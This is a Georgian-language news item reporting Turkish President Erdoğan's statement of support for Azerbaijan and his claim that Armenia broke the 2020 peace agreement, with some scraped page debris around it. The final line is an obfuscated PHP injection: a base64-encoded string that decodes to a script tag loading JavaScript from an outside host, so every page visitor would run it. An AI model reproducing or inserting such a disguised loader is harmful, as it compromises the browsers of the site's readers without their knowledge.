celsiusi
ავერსი საქკაბელი
მთელმა მსოფლიომ უნდა იცოდეს, რომ ჩვენ ვდგავართ აზერბაიჯანელი ძმების მხარეს, – ამის შესახებ თურქეთის პრეზიდენტმა რეჯეფ თაიფ ერდოღანმა ანკარაში სიტყვით გამოსვლისას განაცხადა.
 
თურქეთის პრეზიდენტმა განაცხადა, რომ სომხეთ-აზერბაიჯანის საზღვარზე ბოლო დროს განვითარებული მოვლენები სომხეთის მხრიდან 2020 წლის სამშვიდობო შეთანხმების დარღვევის შედეგია და ამას მიუღებლად მიიჩნევს.
 
„სომხეთმა დაარღვია ის შეთანხმება, რომელიც მიღწეულ იქნა აზერბაიჯანის გამარჯვებით ომის დასრულების შემდეგ, ეს ვითარება მიუღებლად მიგვაჩნია. მთელმა მსოფლიომ უნდა იცოდეს, რომ როგორც ყოველთვის, ჩვენ ვდგავართ აზერბაიჯანელი ძმების მხარეს“, – აღნიშნა ერდოღანმა.
 
ამასთან, თურქეთის პრეზიდენტმა იმედი გამოთქვა, რომ სომხეთი გადავა ამჟამინდელი მცდარი გზიდან და იმუშავებს მშვიდობისთვის. ამასთან, დაამატა, რომ სომხეთი მიიღებს შესაბამის შედეგებს მისი აგრესიული დამოკიდებულებისთვის და შეთანხმების დარღვევისთვის.
 
„ეს დამოკიდებულება, რა თქმა უნდა, გამოიწვევს შედეგებს სომხური მხარისთვის, რომელიც არა მხოლოდ არ ასრულებს ხელმოწერილი ხელშეკრულების პირობებს, არამედ მუდმივად აგრესიულ დამოკიდებულებას ავლენს“, – განაცხადა რეჯეფ თაიფ ერდოღანმა.
428
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");